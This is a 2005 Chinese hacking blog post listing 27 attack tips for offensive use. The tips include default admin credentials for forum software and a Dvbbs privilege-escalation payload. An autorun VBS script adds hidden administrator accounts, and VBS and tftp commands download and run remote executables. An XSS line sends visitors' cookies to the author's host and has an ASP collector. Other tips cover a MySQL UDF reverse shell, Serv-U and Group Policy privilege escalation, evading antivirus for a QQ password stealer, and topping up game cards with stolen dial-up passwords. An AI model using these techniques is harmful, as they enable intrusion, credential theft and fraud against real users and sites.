黑客动画总结(四)

2005/07/13 8:35 | 鬼仔 | 技术文章 | 占个座先

作者:阿汀qq86494359 来源:www.hack6.com

2005年7月1日到10日黑客动画总结

下面几条都是利用默认设置,思路是前台传gif马,后台恢复数据
1.搜索: 共有 1 位会员 新进来宾 [admin] 动网的默认用户密码:admin admin888 动网默认文件路径: UploadFile/

2.搜索: 主题:LDBBS论坛Bug收集 默认用户:wyd1520 admin888 默认文件路径:..\MemberFile\TopicFile\200563014371782.gif

3.搜索: 欢迎我们的新会员 admin 默认为:admin admin admin admin888

4.搜索: 你的位置: 6K论坛 7.0 默认用户:admin 6kadmin

5.做Rm木马里面用到的txt里面是可以写两个地址的,我们可以写入一个假页面,另一个写exe木马地址
比如: u 00:00:05.0 00:00:15.0 http://www.hack6.com/3721.htm (做好的3721的假页面)
u 00:00:05.0 00:00:15.0 http://www.hack6.com/3721.exe (下载木马)

6.北京刷q币简单方法
在肉鸡上运行 Dialupass.exe /allusers /stext "c:\ating.txt" 将密码存到ating.txt里(工具在我网站有下载),再骗到对方的电话号码后四位,到http://cnc.qq.com/bj/ 冲

7.搜索关键字:2001-2002 Qcdn All Rights Reserved. 是青创文章系统,用admin admin登陆后台,在编辑css里写入小马,再用数据库备份来变成asp马

8.动网7.0.0sp2漏洞
申请一个账号ating
然后修改基本资料,换个头像,抓POST /mymodify.asph和他的下一个包,替换myface=后面为
images/userface/image1.gif|||32|||32|||2003-12-30%2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||www.hack6.com|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||Dvbbs,加上多出的字节数,然后nc提交,提权为前台管理员,可以在斑竹版面管理里的基本信息里挂马,也可以用固顶漏洞再提升到后台管理员

9.简单控制网吧,用radmin做好包,用阿D网络工具包扫服务器ip,种植

10.MS05017溢出,用ssport扫2103端口,然后用批量溢出导入MS05017.exe溢出,后缀参数为2103 TOM-YEZOZ1Y43IO 1234 8

11.传奇网站MirCMS带有一个7.0的动网data/mircms_bbs_dvbbs7_010101.mdb或databackup/mircms_bbs_dvbbs7_010101.mdb很多管理员都没改默认设置

12.serv-u提权,CMD命令里输入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598端口转发到81端口,打开我们自己机子上的SERV-U连上他,自己加个用户,再在cmd下连接他提权

13.根目录下写个命令提权
auto.ini 和 SHELL.VBS
autorun.inf 文件
[autorun]
open=shell.vbs 文件
shell.vbs
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest ating",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user ating ating /add",0
wsh.run "net localgroup administrators ating /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
这样要可以访问到对方的根目录,将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序,还要一个木马程序,但是语句就和最后两句一样,通过CMD执行木马程序.

14.编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:
[Startup]
0CmdLine=ating.bat
0Parameters=
将文件scripts.ini保存到“C:\winnt\system32\GroupPolicy\Machine\Scripts” ATING.BAT的内容自己定,加管理员什么的,但是要依赖重启。

15.注入碰到SA时上传总结
(1)找到WEB路径用NBSI自带的上传一句话木马
(2)本地用tftp32架一TFTP服务器,NBSI的NBCommander执行
tftp -i 218.201.49.92 get ating.exe c:\ating.exe
(3)FTP上传,我在总结二里讲了
(4)VBS脚本下载,hack520总结的,在NBSI执行命令那里输入:
echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://soft.163vv.com/77169/c.exe^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"c:\c.exe^",2 >pig.vbs
意思是下载http://soft.163vv.com/77169/c.exe然后保存到c:\c.exe
要用的朋友只需要把里面的网址改为自己的就行了,在NBSI中执行,输入cscript pig.vbs
(4)EXE2BAT法,用exe2bat转换,一行一行的在NBSI那里写入,把前面的@echo off 和每行开头的@echo去掉就行了

16.上海冲游戏点卡是不要ip验证的,大家快冲吧

17安全挂QQ,到http://www.skycn.com/soft/13.html下载软件,运行软件,地址填http://wap.qq.com,登陆

18.有时候我们溢出得到了cmdshell,可以先看看此ip有没有站点论坛什么的,传个gif马上去,然后在cmdshell下还原成asp或php马,在马下传开3389工具

19.有时候在后台传不上马,但在发表文章处可以发现是ewebeditor的系统,搜索源文件,搜src可以看到ewebeditor的路径,/admin_login.asp登陆,默认用户密码admin

20.超简单破解本地QQ,QQ版本QQ2005BATE1,先进入QQ的登陆窗口,
然后选种你想要登陆的QQ,首先随便打几个密码,大概3-4遍后保持错误状态不要关闭,然后进入QQ的根目录里面,找到你破解的那个QQ的文件夹然后在地址后面打上password.txt,最后一行就是密码

21.http://www.8n8.cn/qq/答案为ACAC,免费获得3个月会员的号码

22.动网超市插件默认数据库 /bbs/data/shop.asp 先买个商品,在送人的祝福语里插入一句话木马,或像上次总结的,在申请入驻里插入一句话木马

23.搜索Powered By :Dvbbs Version 7.0.0 Sp2,用xpfox的提权工具很容易提权的,菜鸟快试试
在提升到后台管理员就比较麻烦,提不上去的话,除了上面总结的挂马外,还可以进入分版广告设置,把默认内容改成
<script>
window.location="http://www.hack6.com/"
</script>或者其他的,
还可以盗cookie,输入主题的旁边选择HTML支持,插入获取COOKIES的代码
<script>document.location='http://www.hack6.com/cookie.asp?msg='+document.cookie</script>
写个盗cookie.asp的代码到自己的空间上
<%
cookiefile=Server.MapPath("cookie.txt")
set fs=server.CreateObject("scripting.filesystemobject")
set cookiefile=fs.OpenTextfile(cookiefile,8,True,0)
cookiefile.Write(Request.QueryString&"<br>")
cookiefile.close
set fs = nothing
%>
获取到cookie后目录下会出现一个cookie.txt的文件里面也许就有管理员密码

24.MySql本地提升,hack520写的,利用Mix.dll或my_udf.dll可以直接拿到系统权限,cmd下进入MYSQL的安装目录,输入mysql -uroot -p ,密码为空,登陆。
再输入create function Mixconnect returns string soname 'c:\\Mix\\Mix.dll'; 注册dll
NC监听1234端口,nc -l -p 1234 ,MYSQL的那个CMD窗口输入select Mixconnect('127.0.0.1','1234');,KILL掉mysql的服务进程,重起服务

25.用网站猎手搜别人的马,比如data/admin_news.asp,data/new.asp,images/diy.asp,data/diy.asp,diy.asp,angel.asp,image/angel.asp,images/ok.asp

26.制作免杀的QQ大盗,用PEID脱壳,然后用ResScope导出个exefile,比如QQ1,因为他最小,以防导不回去,然后把它加壳,导回到QQ1,2,3,4,生成的马(四个选项随便选)就免杀了

27.网吧开注册表,(1)建个txt,内容为REGEDIT,保存为ating.bat,双击即可.(2)建个word文档,插入对象,包,随便导个exe,编辑,命令行,输入REGEDIT,更新,运行

相关日志

发表评论